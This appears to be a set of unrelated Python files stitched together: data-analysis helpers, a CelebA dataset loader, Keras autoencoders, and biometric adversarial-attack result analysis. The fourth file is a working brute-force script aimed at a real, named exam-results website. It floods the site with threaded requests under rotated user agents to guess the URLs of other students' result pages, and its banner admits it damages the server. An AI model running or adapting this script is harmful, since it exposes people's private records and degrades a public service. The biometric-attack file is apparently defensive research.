def lf(X, Y, missing='drop', zeroc=True, finiteonly=False, **kwargs):
"""lf stands for "linear fit".
returns a dictionary with results for the regression X ~ m*Y + q
if zeroc=False, q is set to 0."""
X = np.array(X)
Y = np.array(Y)
if finiteonly:
keep = np.isfinite(X) & np.isfinite(Y)
X = X[keep]
Y = Y[keep]
Xc = sm.add_constant(X) if zeroc else X
mod = sm.OLS(endog=Y, exog=Xc, missing=missing, **kwargs)
res = mod.fit()
result = {lf.r2: res.rsquared,
lf.m: res.params[1],
lf.q: res.params[0],
lf.stderr_m: res.bse[1],
lf.pval_m: res.pvalues[1],
lf.stderr_q: res.bse[0],
lf.pval_q: res.pvalues[0],
lf.obj: res,
lf.df: len(X),
lf.stderr_y: res.mse_resid
} if zeroc else {
lf.r2: res.rsquared,
lf.q: np.nan,
lf.m: res.params[0],
lf.stderr_m: res.bse[0],
lf.pval_m: res.pvalues[0],
lf.stderr_q: np.nan,
lf.pval_q: np.nan,
lf.obj: res,
lf.df: len(X),
lf.stderr_y: res.mse_resid
}
return result
# add these strings in the function scope
lf.r2 = 'R^2'
lf.m = 'm'
lf.q = 'q'
lf.stderr_m = 'stderr m'
lf.pval_m = 'pval m'
lf.stderr_q = 'stderr q'
lf.pval_q = 'pval q'
lf.obj = 'obj'
lf.df = 'df'
lf.stderr_y = 'stderr y'
def linfitplot(ax, X, Y, zeroc=True, finiteonly=False, **kwargs):
reg = lf(X, Y, zeroc=zeroc, finiteonly=finiteonly)
lineprops = {'color': 'black'}
for key in kwargs:
lineprops[key] = kwargs[key]
sp = np.linspace(np.nanmin(X), np.nanmax(X), 3)
if zeroc:
ax.plot(sp, reg['m'] * sp + reg['q'], **lineprops)
else:
ax.plot(sp, reg['m'] * sp, **lineprops)
return reg
class Pkl():
def save(obj, filename):
with open(filename, 'wb') as file:
pickle.dump(obj, file)
def load(filename):
with open(filename, 'rb') as file:
return pickle.load(file)
def countdays(t0, t1):
"""count business days between 2 dates"""
return np.busday_count(t0.astype('<M8[D]'), t1.astype('<M8[D]'))
QUARTER_MAP = {1: 'Q1', 4: 'Q2', 7: 'Q3', 10: 'Q4'}
def dateToQuarter(string):
"""takes a string of the type YYYY-MM and converts it to YYY-QN
basically from month to quarter"""
y,m = string.split('-')
return y + '-' + QUARTER_MAP[int(m)]
def show_figure(fig, nb=False):
# pycharm workaround:
fig.show()
# problems with tkinter are solved only if
# you call this method on fig
if not nb: fig.canvas._master.wait_window()
def draw_plot(plot_function, function_args, nb=False):
"""for drawing plots in IDEs and generally
where you're popping out a window.
If you're drawing a plot in a notebook,
set nb=True"""
fig, ax = plt.subplots()
plot_function(ax=ax, **function_args)
fig.tight_layout()
show_figure(fig, nb=nb)
def save_figure(fig, name):
"""saves a figure in 3 different formats
low-res PNG, hi-res PNG and PDF."""
fig.savefig(Paths.FIGURES_DIR.value + name + '.png', dpi=150)
fig.savefig(Paths.FIGURES_DIR.value + name + '_hr.png', dpi=600)
fig.savefig(Paths.FIGURES_DIR.value + name + '.pdf', dpi=600)
def view_code(obj):
"""pretty print source code of an object, if any"""
print("In file: " + getfile(obj) + "\n\n")
print(''.join(getsourcelines(obj)[0]))
|
import os
import torch
import numpy as np
import scipy.misc as m
import re
import glob
from torch.utils import data
class CELEBA(data.Dataset):
def __init__(self, root, split="train", is_transform=False, img_size=(32, 32), augmentations=None):
"""__init__
:param root:
:param split:
:param is_transform:
:param img_size:
:param augmentations
"""
self.root = root
self.split = split
self.is_transform = is_transform
self.augmentations = augmentations
self.n_classes = 40
self.img_size = img_size if isinstance(img_size, tuple) else (img_size, img_size)
self.mean = np.array([73.15835921, 82.90891754, 72.39239876]) # TODO(compute this mean)
self.files = {}
self.labels = {}
self.label_file = self.root+"\\Anno\\list_attr_celeba.txt"
label_map = {}
with open(self.label_file, 'r') as l_file:
labels = l_file.read().split('\n')[2:-1]
for label_line in labels:
f_name = re.sub('jpg', 'png', label_line.split(' ')[0])
label_txt = list(map(lambda x:int(x), re.sub('-1','0',label_line).split()[1:]))
label_map[f_name]=label_txt
self.all_files = glob.glob(self.root+'\\Img\\img_align_celeba_png\\*.png')
# self.all_files = glob.glob(os.path.join(self.root, 'Img', 'img_align_celeba_png') + '*.png')
with open(root+'\\Eval\\list_eval_partition.txt', 'r') as f:
fl = f.read().split('\n')
fl.pop()
if 'train' in self.split:
selected_files = list(filter(lambda x:x.split(' ')[1]=='0', fl))
elif 'val' in self.split:
selected_files = list(filter(lambda x:x.split(' ')[1]=='1', fl))
elif 'test' in self.split:
selected_files = list(filter(lambda x:x.split(' ')[1]=='2', fl))
selected_file_names = list(map(lambda x:re.sub('jpg', 'png', x.split(' ')[0]), selected_files))
base_path = '\\'.join(self.all_files[0].split('\\')[:-1])
self.files[self.split] = list(map(lambda x: '\\'.join([base_path, x]), set(map(lambda x:x.split('\\')[-1], self.all_files)).intersection(set(selected_file_names))))
self.labels[self.split] = list(map(lambda x: label_map[x], set(map(lambda x:x.split('\\')[-1], self.all_files)).intersection(set(selected_file_names))))
self.class_names = ['5_o_Clock_Shadow', 'Arched_Eyebrows', 'Attractive', 'Bags_Under_Eyes', 'Bald', 'Bangs',
'Big_Lips', 'Big_Nose', 'Black_Hair', 'Blond_Hair', 'Blurry', 'Brown_Hair', 'Bushy_Eyebrows',
'Chubby', 'Double_Chin', 'Eyeglasses', 'Goatee', 'Gray_Hair', 'Heavy_Makeup', 'High_Cheekbones',
'Male', 'Mouth_Slightly_Open', 'Mustache', 'Narrow_Eyes', 'No_Beard', 'Oval_Face', 'Pale_Skin',
'Pointy_Nose', 'Receding_Hairline', 'Rosy_Cheeks', 'Sideburns', 'Smiling', 'Straight_Hair', 'Wavy_Hair',
'Wearing_Earrings', 'Wearing_Hat', 'Wearing_Lipstick', 'Wearing_Necklace', 'Wearing_Necktie', 'Young']
if len(self.files[self.split]) < 2:
raise Exception("No files for split=[%s] found in %s" % (self.split, self.root))
print("Found %d %s images" % (len(self.files[self.split]), self.split))
def __len__(self):
"""__len__"""
return len(self.files[self.split])
def __getitem__(self, index):
"""__getitem__
:param index:
"""
img_path = self.files[self.split][index].rstrip()
label = self.labels[self.split][index]
img = m.imread(img_path)
if self.augmentations is not None:
img = self.augmentations(np.array(img, dtype=np.uint8))
if self.is_transform:
img = self.transform_img(img)
return [img] + label
def transform_img(self, img):
"""transform
Mean substraction, remap to [0,1], channel order transpose to make Torch happy
"""
img = img[:, :, ::-1]
img = img.astype(np.float64)
img -= self.mean
img = m.imresize(img, (self.img_size[0], self.img_size[1]))
# Resize scales images from 0 to 255, thus we need
# to divide by 255.0
img = img.astype(float) / 255.0
# NHWC -> NCWH
img = img.transpose(2, 0, 1)
img = torch.from_numpy(img).float()
return img
if __name__ == '__main__':
import torchvision
import matplotlib.pyplot as plt
local_path = r'X:\Shared datasets\CELEBA'
dst = CELEBA(local_path, is_transform=True, augmentations=None)
bs = 4
trainloader = data.DataLoader(dst, batch_size=bs, num_workers=0)
for i, data in enumerate(trainloader):
imgs = data[0]
imgs = imgs.numpy()[:, ::-1, :, :]
imgs = np.transpose(imgs, [0,2,3,1])
f, axarr = plt.subplots(bs,4)
for j in range(bs):
axarr[j][0].imshow(imgs[j])
axarr[j][1].imshow(dst.decode_segmap(labels.numpy()[j]))
axarr[j][2].imshow(instances[j,0,:,:])
axarr[j][3].imshow(instances[j,1,:,:])
plt.show()
a = raw_input()
if a == 'ex':
break
else:
plt.close()
|
import pickle # remove after getting final version of code
import os
import numpy as np
from keras.utils import np_utils
from keras.layers import (
Input,
Conv2D,
Conv3D,
Flatten,
Dense,
Dropout,
Reshape,
BatchNormalization,
Concatenate
)
from keras.models import Model, load_model
from keras.optimizers import Adam, RMSprop
from keras.callbacks import ModelCheckpoint
class ExperimentalHSNAutoEncoder:
"""
Convolutional layers on the encoder part were inspired on the
HybridSpectralNet architecture.
"""
def __init__(self, window_shape, filepath='best_model.hdf5'):
self._decoder(self._encoder((25,25,10)))
self.model = Model(inputs=self.input_layer, outputs=self.decoder_output)
self.model.compile(loss='mean_squared_error', optimizer=RMSprop())#, metrics=['accuracy'])
self.model.summary()
abspath = os.path.abspath('.')
self.filepath = os.path.abspath(os.path.join(abspath,filepath))
checkpoint = ModelCheckpoint(self.filepath, monitor='accuracy', verbose=1, save_best_only=True, mode='max')
self.callbacks_list = [checkpoint]
def _encoder(self, window_shape):
"""input_shape: (height, width, num_bands)"""
self.height, self.width, self.num_bands = window_shape
## input layer
self.input_layer = Input(
(
self.height,
self.width,
self.num_bands,
1
)
)
########################################################################
# convolutional layers
########################################################################
conv_layer1 = Conv3D(filters=8, kernel_size=(3, 3, 2), activation='relu')(self.input_layer) # 23, 23, 9, 8
conv_layer2 = Conv3D(filters=16, kernel_size=(3, 3, 5), activation='relu')(conv_layer1) # 21, 21, 5, 16
conv_layer3 = Conv3D(filters=32, kernel_size=(3, 3, 3), activation='relu')(conv_layer2) # 19, 19, 3, 32
conv3d_shape = conv_layer3._keras_shape
conv_layer3 = Reshape((conv3d_shape[1],conv3d_shape[2],conv3d_shape[3]*conv3d_shape[4]))(conv_layer3) # 19, 19, 96
conv2 = Conv2D(
filters=64,
kernel_size=(4,4),
activation='relu'
)(conv_layer3) # 16 x 16 x 64
conv2 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv2)
conv2 = BatchNormalization()(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2) #8 x 8 x 64
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same')(pool2) #8 x 8 x 128 (small and thick)
conv3 = BatchNormalization()(conv3)
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same')(conv3)
conv3 = BatchNormalization()(conv3)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same')(conv3) #8 x 8 x 256 (small and thick)
conv4 = BatchNormalization()(conv4)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same')(conv4)
self.encoder_output = BatchNormalization()(conv4)
return self.encoder_output
def _decoder(self, encoder_output):
"""
"""
conv5 = Conv2D(128, (3, 3), activation='relu', padding='same')(encoder_output) #8 x 8 x 128
conv5 = BatchNormalization()(conv5)
conv5 = Conv2D(128, (3, 3), activation='relu', padding='same')(conv5)
conv5 = BatchNormalization()(conv5)
conv6 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv5) #8 x 8 x 64
conv6 = BatchNormalization()(conv6)
conv6 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv6)
conv6 = BatchNormalization()(conv6)
up1 = UpSampling2D((3,3))(conv6) # 24 x 24 x 64
conv7 = Conv2D(96, (6, 6), activation='relu')(up1) # 19 x 19 x 96
conv7 = BatchNormalization()(conv7)
conv7 = Conv2D(96, (6, 6), activation='relu', padding='same')(conv7)
conv7 = BatchNormalization()(conv7)
up2 = UpSampling2D((2,2))(conv7)
up2shp = up2._keras_shape
conv7 = Reshape((up2shp[1], up2shp[2], 3, int(up2shp[3]/3)))(up2) # 38, 38, 3, 32
conv8 = Conv3D(16, kernel_size=(18,18,1), activation='relu')(conv7)
conv8 = BatchNormalization()(conv8)
conv8 = Conv3D(16, kernel_size=(18,18,1), activation='relu', padding='same')(conv8)
conv8 = BatchNormalization()(conv8)
up3 = UpSampling3D((2,2,4))(conv8)
conv9 = Conv3D(8, kernel_size=(18,18,3), activation='relu')(up3)
conv9 = BatchNormalization()(conv9)
conv9 = Conv3D(8, kernel_size=(3,3,3), activation='relu', padding='same')(conv9)
conv9 = BatchNormalization()(conv9)
conv10 = Conv3D(1, kernel_size=(3,3,2), activation='relu', padding='same')(conv9)
self.decoder_output = BatchNormalization()(conv10)
return self.decoder_output
def load_weights(self, filepath):
self.filepath = filepath
self.model = load_model(filepath)
self.model.compile(loss='mean_squared_error', optimizer=RMSprop())
def fit(self, X, y, batch_size=256, epochs=100):
# transform matrices to correct format
self.num_bands = X.shape[-1]
X = X.reshape(
-1,
self.height,
self.width,
self.num_bands,
1
)
y = y.reshape(
-1,
self.height,
self.width,
self.num_bands,
1
)
self.history = self.model.fit(
x=X,
y=y,
batch_size=batch_size,
epochs=epochs,
callbacks=self.callbacks_list
)
def predict(self, X, filepath=None):
# assert: self.filepath or filepath must exist
if filepath:
self.load_weights(filepath)
self.model.compile(loss='mean_squared_error', optimizer=RMSprop())
self.num_bands = X.shape[-1]
X = X.reshape(
-1,
self.height,
self.width,
self.num_bands,
1
)
y_pred = np.argmax(self.model.predict(X), axis=1)
return y_pred
class MLPAutoEncoder:
"""
"""
def __init__(self, num_bands, filepath='best_model.hdf5'):
self.num_bands = num_bands
self._decoder(self._encoder(num_bands))
self.model = Model(inputs=self.input_layer, outputs=self.decoder_output)
self.model.compile(loss='mean_squared_error', optimizer=RMSprop())#, metrics=['accuracy'])
self.model.summary()
abspath = os.path.abspath('.')
self.filepath = os.path.abspath(os.path.join(abspath,filepath))
checkpoint = ModelCheckpoint(self.filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')
self.callbacks_list = [checkpoint]
def _encoder(self, num_bands):
"""
"""
self.input_layer = Input((num_bands,))
layer1 = Dense(32, input_shape=self.input_layer._keras_shape, activation='relu')(self.input_layer)
layer1 = BatchNormalization()(layer1)
layer2 = Dense(16, activation='relu')(layer1)
layer2 = BatchNormalization()(layer2)
layer3 = Dense(4, activation='relu')(layer2)
self.encoder_output = BatchNormalization()(layer3)
return self.encoder_output
def _decoder(self, encoder_output):
"""
"""
layer4 = Dense(16, input_shape=self.encoder_output._keras_shape, activation='relu')(encoder_output)
layer4 = BatchNormalization()(layer4)
layer5 = Dense(32, activation='relu')(layer4)
layer5 = BatchNormalization()(layer5)
self.decoder_output = Dense(10, activation=None)(layer5)
return self.decoder_output
def load_weights(self, filepath):
self.filepath = filepath
self.model = load_model(filepath)
self.model.compile(loss='mean_squared_error', optimizer=RMSprop())
def fit(self, X, y, batch_size=256, epochs=100):
# transform matrices to correct format
self.num_bands = X.shape[-1]
X = X.reshape(-1, self.num_bands,)
y = y.reshape(-1, self.num_bands,)
self.history = self.model.fit(
x=X,
y=y,
batch_size=batch_size,
epochs=epochs,
callbacks=self.callbacks_list
)
def predict(self, X, filepath=None):
# assert: self.filepath or filepath must exist
if filepath:
self.load_weights(filepath)
self.model.compile(loss='mean_squared_error', optimizer=RMSprop())
#else:
# self.load_model(self.filepath)
#self.model.compile(loss='categorical_crossentropy', optimizer=self.adam, metrics=['accuracy'])
X_pred = self.model.predict(X)
mse = ((X_pred-X)**2).mean(axis=1)
return mse
class MLPEncoderClassifier:
def __init__(self, encoder_list, num_targets, filepath='best_model.hdf5'):
self.num_targets = num_targets
self.num_encoders = len(encoder_list)
MergedEncoders = Concatenate()([model.encoder_output for model in encoder_list])
self._MLPClassifier(MergedEncoders)
self.model = Model(inputs=[model.input_layer for model in encoder_list], outputs=self.output_layer)
self.adam = Adam(lr=0.001, decay=1e-06)
self.model.compile(loss='categorical_crossentropy', optimizer=self.adam, metrics=['accuracy'])
self.model.summary()
abspath = os.path.abspath('.')
self.filepath = os.path.abspath(os.path.join(abspath,filepath))
checkpoint = ModelCheckpoint(self.filepath, monitor='accuracy', verbose=1, save_best_only=True, mode='max')
self.callbacks_list = [checkpoint]
def _MLPClassifier(self, merged_encoders_outputs):
layer1 = BatchNormalization()(merged_encoders_outputs)
layer1 = Dense(32, activation='relu')(layer1)
layer1 = BatchNormalization()(layer1)
layer2 = Dense(16, activation='relu')(layer1)
layer2 = BatchNormalization()(layer2)
self.output_layer = Dense(self.num_targets, activation='sigmoid')(layer2)
return self.output_layer
def fit(self, X, y, batch_size=256, epochs=100):
# transform matrices to correct format
self.num_bands = X.shape[-1]
X = X.reshape(-1, self.num_bands,)
y = np_utils.to_categorical(y, num_classes=self.num_targets)
self.history = self.model.fit(
x=[X for i in range(self.num_encoders)],
y=y,
batch_size=batch_size,
epochs=epochs,
callbacks=self.callbacks_list
)
def predict(self, X, filepath=None):
# assert: self.filepath or filepath must exist
if filepath:
self.load_weights(filepath)
self.model.compile(loss='mean_squared_error', optimizer=RMSprop())
#else:
# self.load_model(self.filepath)
#self.model.compile(loss='categorical_crossentropy', optimizer=self.adam, metrics=['accuracy'])
y_pred = np.argmax(self.model.predict([X for i in range(self.num_encoders)]), axis=1)
return y_pred
|
#THIS PROGRAM IS FOR SHOWING HOW BRUTE FORCE IS USED ON WEBSITES.I HAVE GIVEN EXAMPLE OF WEBSITE OF RESULTS. DO NOT MISUSE OF THIS PROGRAM USE IT FOR READING PURPOSE. I AM NOT RESPONSIBLE FOR MISUSE AND ANY DAMAGE CAUSED BY THIS PROGRAM!
#THIS PROGRAM WORKS AS EXPECTED AND CAUSE DAMAGE TO SERVER. USE IT FOR READING PURPOSE AND TEST SIMILAR PROGRAM ON YOUR WEBSITE FOR PENETRATION TESTING
#useragents list
headers_useragents = []
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
useragent_list()
#background colors
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
#libraries
import urllib2
import threading
from tqdm import tqdm
import random
import time
print('''
%s%s/===========================%sv1.0%s============================/
%s[[[[[[[[[[[[[[[[[[[[[[[[[[%sBrute Force Example%s]]]]]]]]]]]]]]]]]]]]]]]]]]
%s -<NAME>
\033[91mTHIS PROGRAM IS FOR SHOWING HOW BRUTE FORCE IS USED ON WEBSITES. I HAVE GIVEN EXAMPLE OF WEBSITE OF RESULTS. DO NOT MISUSE OF THIS PROGRAM USE IT FOR READING PURPOSE. I AM NOT RESPONSIBLE FOR MISUSE AND ANY DAMAGE CAUSED BY THIS PROGRAM!
THIS PROGRAM WORKS AS EXPECTED AND CAUSE DAMAGE TO SERVER. USE IT FOR READING PURPOSE AND TEST SIMILAR PROGRAM ON YOUR WEBSITE FOR PENETRATION TESTING\033[0m
'''%(bcolors.BOLD,bcolors.OKBLUE,bcolors.OKGREEN,bcolors.OKBLUE,bcolors.HEADER,bcolors.OKGREEN,bcolors.HEADER,bcolors.OKGREEN))
#main program starts here
#os.system("ulimit -Hn 4096") #increase open files limit
isfinished = False #flag to stop loop when result will found
#getting Seat no. and starting letter of mother name to reduce requests
#starting letter of mother's name is not necessary. Our wordlist will generate nearly 18000 URLs to find one result
rn = raw_input(bcolors.WARNING+"Always Check if website is working or not\nRoll No:")
sname = raw_input("Mother's Starting Letter (if you guess):")
#function to send HTTP Requests
def req(url,i):
if i==0:
print("\033[F\033[KPlease confirm URL: " + url+"\n") #for checking
try: #check if responce code is 200 except pass
global isfinished #access global scope variable
r = urllib2.Request(url)
r.add_header('User-Agent', random.choice(headers_useragents))
urllib2.urlopen(r)
print("\n\n"+bcolors.OKGREEN+url+"\n\n"+bcolors.OKBLUE)
isfinished=True #We got link, lets break loop
except:
pass #likly 404 error, lets continue loop
#wordlist
f=open("wordlist.txt","r")
arr=[] #array of starting 3 letters of mother's name
for line in f:
if not sname=="": #guessing letter is given
if line.startswith(sname):
arr.append(line.replace("\n","")) #nearly 700 requests to be sent
else:
arr.append(line.replace("\n","")) #nearly 18000 requests to be sent
print(bcolors.BOLD+"Probability: 1/%d\n"%len(arr))
f.close()
www="www." # for sending requests by small change in URL
#large amount of requests can increase stress on server, check if server responding or not
def checkifurlkilled():
global www
try:
r=urllib2.Request("http://www.sscresult.mkcl.org/")
r.add_header("Referer","http://www.sscresult.mkcl.org/")
urllib2.urlopen(r)
print("\033[F\033[KResumed")
www="www."
return True
except:
print("\033[F\033[KWaiting for Server Response..."+random.choice(['.','..','...']))
www=""
try:
urllib2.urlopen("http://sscresult.mkcl.org/")
print("\033[F\033[KResumed")
return True
except:
time.sleep(1) #give some time to rest server
return False #for again executing this function
for i in tqdm(range(len(arr))):
#break loop if URL is found
if isfinished==True:
print(bcolors.FAIL+"Breaking loop....."+bcolors.ENDC)
break
#After each 100 requests, check if server is dead
if i%100==0:
while True:
if checkifurlkilled()==True:
break
#for Error: too many open files
if i%600==0 and not i==0:
#time.sleep(2) #increase time if this error occurs simultaneously
pass
#sending first 200 requests with 'www.'
if i<200:
t = threading.Thread(target=req,args=("http://www.sscresult.mkcl.org/result/A/%s_%s.html"%(rn,arr[i]),i,)) #using threading to send requests more rapidly
t.start()
else:
t = threading.Thread(target=req,args=("http://%ssscresult.mkcl.org/result/A/%s_%s.html"%(www,rn,arr[i]),i,))
t.start()
#end
print(bcolors.ENDC)
#end colors
|
<reponame>sohailhabib/SecurityMetrics
from pathlib import Path
import numpy as np
import pandas as pd
import os
# from metrics.confusion_matrix import ConfusionMatrix
# from metrics.roc_curve import RocCurve
import matplotlib.pyplot as plt
from joblib import dump, load
import seaborn as sns
import glob
root_path = Path(__file__).parent.parent.parent.parent
plt_save_path = os.path.join(root_path, "experiment_results\\paper_plots\\")
data_sets = ['touch', 'keystroke', 'mouse', 'gait', 'voice']
# data_sets = ['touch', 'keystroke', 'mouse', 'gait']
clf_types = ['svm', 'knn', 'rf']
touch_dir = "adv_attack_hmog"
keystroke_dir = "adv_attack_dsn_cv"
mouse_dir = "adv_attack_mouse"
gait_dir = "adv_attack_gait"
voice_dir = "adv_attack_voice"
hyp_at_f_name = {'svm': '*_hyp_at_prd_svm.csv', 'knn': '*_hyp_at_prd_knn.csv', 'rf': '*_hyp_at_prd_rf.csv'}
stat_at_f_name = {'svm': '*_stat_at_prd_svm.csv', 'knn': '*_stat_at_prd_knn.csv', 'rf': '*_stat_at_prd_rf.csv'}
kpp_at_f_name = {'svm': '*_kpp_at_prd_svm.csv', 'knn': '*_kpp_at_prd_knn.csv', 'rf': '*_kpp_at_prd_rf.csv'}
mk_at_f_name = {'svm': '*_mk_at_prd_svm.csv', 'knn': '*_mk_at_prd_knn.csv', 'rf': '*_mk_at_prd_rf.csv'}
exp_dir = {'touch': touch_dir, 'keystroke': keystroke_dir, 'mouse': mouse_dir, 'gait': gait_dir, 'voice': voice_dir}
exp_paths = {ds: os.path.join(root_path, f'experiment_results\\{exp_dir[ds]}\\')
for ds in data_sets}
at_file_names = {'Hypervolume': hyp_at_f_name, 'Vanilla-s': stat_at_f_name,
'K-means++': kpp_at_f_name, 'MasterKey': mk_at_f_name}
at_types = ['Hypervolume', 'Vanilla-s', 'K-means++', 'MasterKey']
gr_list = ['gr1', 'gr2']
gr_params = {"touch": {"gr1": 14,
"gr2": 12},
"keystroke": {"gr1": 6,
"gr2": 7},
"mouse": {"gr1": 6,
"gr2": 6},
"gait": {"gr1": 5,
"gr2": 5},
"voice": {"gr1": 8,
"gr2": 7},
}
cluster_paths = {ds: os.path.join(exp_paths[ds], 'cluster_data\\') for ds in data_sets}
hyp_cls_scoring_paths = {ds: {gr: glob.glob(os.path.join(exp_paths[ds], f"*_hyp_cls_ranking.csv"))
for gr in gr_list} for ds in data_sets}
hyp_cls_scoring_files = {ds: {gr: pd.read_csv(hyp_cls_scoring_paths[ds][gr][0])
for gr in gr_list} for ds in data_sets}
cls_ol_rankings = pd.DataFrame(columns=['Biometric', 'group', 'cluster_number', 'mean_ol', 'cls_score'])
row = 0
for ds in data_sets:
for gr in gr_list:
for rank in range(6):
cls_ol_rankings.loc[row, 'Biometric'] = ds
cls_ol_rankings.loc[row, 'group'] = gr
cls_ol_rankings.loc[row, 'mean_ol'] = hyp_cls_scoring_files[ds][gr].mean_ol.iloc[rank]
cls_ol_rankings.loc[row, 'cluster_number'] = hyp_cls_scoring_files[ds][gr].cluster_number.iloc[rank]
cls_ol_rankings.loc[row, 'cls_score'] = hyp_cls_scoring_files[ds][gr].cls_score.iloc[rank]
row += 1
cluster_data_path = {ds: {gr: {cls: os.path.join(cluster_paths[ds], f"cls_group_{gr[-1]}_{cls}.csv")
for cls in range(gr_params[ds][gr])}
for gr in gr_list}
for ds in data_sets}
cls_data = {ds: {gr: {cls: pd.read_csv(cluster_data_path[ds][gr][cls])
for cls in range(gr_params[ds][gr])}
for gr in gr_list}
for ds in data_sets}
at_prd_file_names = {ds: {at: {clf: glob.glob(os.path.join(exp_paths[ds], at_file_names[at][clf]))
for clf in clf_types}
for at in at_types}
for ds in data_sets}
at_prd_files = {ds: {at: {clf: {f.split("\\")[-1].split('_')[0]: pd.read_csv(f)
for f in at_prd_file_names[ds][at][clf]}
for clf in clf_types}
for at in at_types}
for ds in data_sets}
gr_list = ['gr1', 'gr2']
hyp_cls_score = {ds: {gr: pd.read_csv(os.path.join(exp_paths[ds], f"{gr}_hyp_at_score.csv")) for gr in gr_list}
for ds in data_sets}
hyp_cls_info = {ds: {clf: {gr: at_prd_files[ds]['Hypervolume'][clf][gr].cluster_number.unique()
for gr in gr_list}
for clf in clf_types}
for ds in data_sets}
at_cls_dat = {
ds: {
clf: {
gr: {
cls: at_prd_files[ds]['Hypervolume'][clf][gr]
[at_prd_files[ds]['Hypervolume'][clf][gr].cluster_number == cls].drop('cluster_number', axis=1)
for cls in hyp_cls_info[ds][clf][gr]}
for gr in gr_list}
for clf in clf_types}
for ds in data_sets}
user_crk = {
ds: {
clf: {
gr: {
cls: {
tr: at_cls_dat[ds][clf][gr][cls].iloc[tr, :]
[at_cls_dat[ds][clf][gr][cls].iloc[tr, :] == 1].index.to_numpy()
for tr in range(len(at_cls_dat[ds][clf][gr][cls]))}
for cls in hyp_cls_info[ds][clf][gr]}
for gr in gr_list}
for clf in clf_types}
for ds in data_sets}
user_crk_comb = {
ds: {clf: {gr: {cls: pd.DataFrame.from_dict(dict([(k, pd.Series(v))
for k, v in user_crk[ds][clf][gr][cls].items()]))
for cls in hyp_cls_info[ds][clf][gr]}
for gr in gr_list}
for clf in clf_types}
for ds in data_sets}
user_crk_1 = {
ds: {clf: {gr: {tr: {cls: user_crk[ds][clf][gr][cls][tr] for cls in hyp_cls_info[ds][clf][gr]}
for tr in range(3)}
for gr in gr_list}
for clf in clf_types}
for ds in data_sets}
user_crk_comb_1 = {
ds: {clf: {gr: {tr: pd.DataFrame.from_dict(dict([(k, pd.Series(v))
for k, v in user_crk_1[ds][clf][gr][tr].items()]))
for tr in range(3)}
for gr in gr_list}
for clf in clf_types}
for ds in data_sets}
# Writing file to disk
hyp_data_save_path = os.path.join(plt_save_path, 'hyp_at_usr_analysis')
for ds in data_sets:
for clf in clf_types:
for gr in gr_list:
for tr in range(3):
user_crk_comb_1[ds][clf][gr][tr].columns.name = "cluster_number"
user_crk_comb_1[ds][clf][gr][tr].to_csv(
os.path.join(hyp_data_save_path, f"{ds}//usr_crk_{gr}_{clf}_{tr}.csv"), index=True, mode='w+')
for ds in data_sets:
for clf in clf_types:
for gr in gr_list:
at_prd_files[ds]['Hypervolume'][clf][gr] = \
at_prd_files[ds]['Hypervolume'][clf][gr].drop('cluster_number', axis=1)
a = 1
per_usr_cracked_dict = {ds: {clf: {gr: pd.DataFrame(columns=at_types)
for gr in gr_list}
for clf in clf_types}
for ds in data_sets}
row_range = 50
for ds in data_sets:
for at in at_types:
for clf in clf_types:
for gr in gr_list:
cracked_user = np.empty(0)
users = at_prd_files[ds][at][clf][gr].columns.to_numpy()
for row in range(row_range):
at_cracked_user = \
at_prd_files[ds][at][clf][gr].iloc[row, :][
at_prd_files[ds][at][clf][gr].iloc[row, :] == 1].index.to_numpy()
cracked_user = np.unique(np.append(cracked_user, at_cracked_user))
per_usr_cracked = np.round(len(cracked_user) / len(users), 5)
per_usr_cracked_dict[ds][clf][gr].loc[row, at] = per_usr_cracked
per_usr_cracked_dict_comb = {ds: {clf: {at: pd.DataFrame(columns=['try_num', 'per_crk', 'at_type']) for at in at_types}
for clf in clf_types}
for ds in data_sets}
plt_df = {ds: {clf: pd.DataFrame(columns=['try_num', 'per_crk', 'at_type'])
for clf in clf_types}
for ds in data_sets}
for ds in data_sets:
for clf in clf_types:
for at in at_types:
for row in range(row_range):
per_usr_cracked_dict_comb[ds][clf][at].loc[row, 'try_num'] = row + 1
val_1 = per_usr_cracked_dict[ds][clf]['gr1'].loc[row, at]
val_2 = per_usr_cracked_dict[ds][clf]['gr2'].loc[row, at]
